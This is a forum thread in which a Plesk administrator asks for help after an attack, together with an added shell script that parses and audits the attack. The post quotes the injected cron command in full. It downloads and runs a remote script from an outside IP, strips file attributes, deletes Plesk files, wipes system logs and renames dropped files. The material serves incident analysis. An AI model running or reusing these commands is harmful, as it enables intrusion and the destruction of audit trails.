
Help reverting changes due to exploit

Discussion in 'Plesk 9.x for Linux Issues, Fixes, How-To' started by matteosistisette, Jan 17, 2013.

  1. matteosistisette (New Pleskian)

    Hi,

    I have received an attack that probably exploited the vulnerability described in:
    http://kb.parallels.com/en/113321

    Someone or something was able to inject a cronjob into my server which ran:

    Cron <root@ks3094309>
      cd /tmp;
      wget http://128.173.237.127:8080/browser/browser/backup1.sh;
      chmod x backup1.sh;
      sh /tmp/backup1.sh;
      rm -Rf /tmp/backup1.sh;
      chattr -ASacdijsu /usr/local/psa/admin/htdocs/enterprise/control/control.php;
      chattr -ASacdijsu /usr/local/psa/admin/htdocs/enterprise/control/index.jsp;
      rm -Rf /usr/local/psa/admin/htdocs/enterprise/control/eng.php;
      rm -Rf /usr/local/psa/admin/htdocs/enterprise/control/control.php;
      rm -Rf /usr/local/psa/admin/htdocs/enterprise/control/index.jsp;
      rm -Rf /usr/local/psa/admin/logs/httpsd_access_log;
      rm -Rf /var/log/cron;
      rm -Rf /var/log/secure;
      rm -Rf /var/log/lastlog;
      rm -Rf /var/log/auth.log;
      cd /usr/local/psa/admin/htdocs/enterprise/control/;
      mv agent.php agenti.php;
      mv old.php agenti.php;
      mv Agent.php agenti.php


    Among other things, this downloads and executes a shell script. I'm already investigating the content of the script and how to revert (if possible) the changes it made.

    However, the command above does also other things that I don't understand. It seems like it screwed up some components of Plesk.

    AFTER this, I installed all the updates and ran the vulnerability check available here: http://kb.parallels.com/en/113424 which returned OK (it didn't before the updates).

    The question is: can anybody explain to me what the above-mentioned commands do, which components of psa may have been compromised, and how I can restore them? (Not taking into account the execution of the downloaded shell script, of course.)
    Or can I assume that by installing the updates, any compromised Plesk components have been restored? (I guess not)

    Thanks
    m.
     
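To make the "what do these commands do" question concrete, here is an added triage script written for this page; it is not from the thread and not a Parallels/Plesk tool. It embeds the cron command string as posted (as inert data: the script never fetches or runs backup1.sh), splits it into its individual commands, tags each with its role in the attack, and resolves the relative mv arguments against the preceding cd so it can list every absolute path the payload touched. The tag names (download, stage, unlock, logwipe, delete, rename, chdir) and the audit_paths helper are this example's own inventions, not anything from Plesk.

```shell
#!/bin/sh
# Added triage helper for the cron payload quoted above. Not from the thread
# or from Plesk: it only parses the command string, tags each step, and
# resolves paths. It never downloads or executes the payload.

# Constructed copy of the cron command exactly as posted. The URL is data
# only; nothing in this script contacts it.
CRON_CMD='cd /tmp;wget http://128.173.237.127:8080/browser/browser/backup1.sh;chmod x backup1.sh;sh /tmp/backup1.sh;rm -Rf /tmp/backup1.sh;chattr -ASacdijsu /usr/local/psa/admin/htdocs/enterprise/control/control.php;chattr -ASacdijsu /usr/local/psa/admin/htdocs/enterprise/control/index.jsp;rm -Rf /usr/local/psa/admin/htdocs/enterprise/control/eng.php;rm -Rf /usr/local/psa/admin/htdocs/enterprise/control/control.php;rm -Rf /usr/local/psa/admin/htdocs/enterprise/control/index.jsp;rm -Rf /usr/local/psa/admin/logs/httpsd_access_log;rm -Rf /var/log/cron;rm -Rf /var/log/secure;rm -Rf /var/log/lastlog;rm -Rf /var/log/auth.log;cd /usr/local/psa/admin/htdocs/enterprise/control/;mv agent.php agenti.php;mv old.php agenti.php;mv Agent.php agenti.php'

# Tag one command with the role it plays in the attack (tag names are ours).
classify_cmd() {
  case "$1" in
    "wget "*|"curl "*)               echo download ;;  # fetch second stage
    "chmod "*|"sh "*)                echo stage ;;     # make it runnable, run it
    "chattr "*)                      echo unlock ;;    # strip immutable/append-only bits
    "rm "*" /var/log/"*|"rm "*_log)  echo logwipe ;;   # destroy the audit trail
    "rm "*)                          echo delete ;;    # remove Plesk files / the stager
    "mv "*)                          echo rename ;;    # hide dropped files under a new name
    "cd "*)                          echo chdir ;;
    *)                               echo other ;;
  esac
}

# Split the ;-joined one-liner into commands and print "tag<TAB>command".
explain_cron() {
  printf '%s\n' "$1" | tr ';' '\n' | while IFS= read -r cmd; do
    [ -n "$cmd" ] || continue
    printf '%s\t%s\n' "$(classify_cmd "$cmd")" "$cmd"
  done
}

# Resolve a path argument ($2) against the directory set by the last cd ($1).
resolve() {
  case "$2" in
    /*) echo "$2" ;;
    *)  echo "${1%/}/$2" ;;
  esac
}

# Every file the payload touches, as absolute paths, one per line, sorted.
# Relative mv/chmod arguments get their directory from the preceding cd.
touched_paths() {
  printf '%s\n' "$1" | tr ';' '\n' | {
    cwd=/
    while IFS= read -r cmd; do
      set -f; set -- $cmd; set +f   # word-split the command, no globbing
      case "$1" in
        cd)              cwd=$2 ;;
        chattr|rm|chmod) resolve "$cwd" "$3" ;;                 # flags, then path
        sh)              resolve "$cwd" "$2" ;;
        mv)              resolve "$cwd" "$2"; resolve "$cwd" "$3" ;;
      esac
    done
  } | sort -u
}

# On the affected host: report which of those files still exist and their
# ext attributes (lsattr comes from e2fsprogs and may be absent).
audit_paths() {
  touched_paths "$1" | while IFS= read -r p; do
    if [ -e "$p" ]; then
      attrs=$(command -v lsattr >/dev/null 2>&1 && lsattr -d "$p" 2>/dev/null | cut -d' ' -f1)
      printf 'present  %-22s %s\n' "${attrs:-?}" "$p"
    else
      printf 'MISSING  %-22s %s\n' - "$p"
    fi
  done
}

# Default run explains the payload; "--audit" checks the live filesystem.
if [ "${1:-}" = "--audit" ]; then
  audit_paths "$CRON_CMD"
else
  explain_cron "$CRON_CMD"
  echo
  touched_paths "$CRON_CMD"
fi
```

Reading the tagged output answers most of the question: the two chattr -ASacdijsu calls clear the immutable and append-only attributes on control.php and index.jsp so that the rm calls right after them succeed; the five logwipe deletions cover both RHEL-style (/var/log/secure, /var/log/cron) and Debian-style (/var/log/auth.log) logs plus Plesk's own httpsd_access_log, so the cron entry and the URL are most of the evidence left; and the three mv commands all target the same name, so after the run agenti.php in the control directory is whichever of agent.php, old.php or Agent.php existed last (mv of a missing source simply fails). Running the script with --audit on the box shows which of the 13 paths are still present and whether any still carry odd attributes.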
  2. matteosistisette (New Pleskian)

    There MUST be some tool provided by Parallels to fix the damage done by this attack. I have seen posts by people affected by the exact same attack, so I guess it's been pretty common, and after all this is due to a security vulnerability in Plesk.
     